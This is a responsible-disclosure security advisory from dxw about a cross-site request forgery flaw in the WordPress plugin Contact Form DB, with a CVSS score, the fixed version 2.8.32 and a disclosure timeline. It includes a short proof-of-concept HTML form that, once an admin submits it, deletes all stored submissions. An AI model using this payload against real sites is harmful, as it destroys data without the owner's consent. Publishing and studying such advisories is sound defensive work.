Reporter Tom Adams
Software: Contact Form DB
Advisory report: https://security.dxw.com/advisories/csrf-in-contact-form-db-allows-attacker-to-delete-all-stored-form-submissions/
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)
CSRF in Contact Form DB allows attacker to delete all stored form submissions
An attacker able to convince a logged in admin user to follow a link (for instance via spearphishing) will be able to cause all records stored by this plugin to be removed.
Proof of concept
<form action=\"http://localhost/wp-admin/admin.php?page=CF7DBPluginSubmissions\" method=\"post\">
<input name=\"all\" type=\"text\" value=\"y\">
<input name=\"delete\" type=\"text\" value=\"y\">
Upgrade to version 2.8.32 or later
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on firstname.lastname@example.org to acknowledge this report if you received it via a third party (for example, email@example.com) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
2015-02-17: Reported to vendor by email
2015-02-22: Vendor responded and agreed a schedule for fix
2015-02-23: Vendor published a fix in version 2.8.32
2015-03-04: Advisory published
Discovered by dxw:
Please visit security.dxw.com for more information.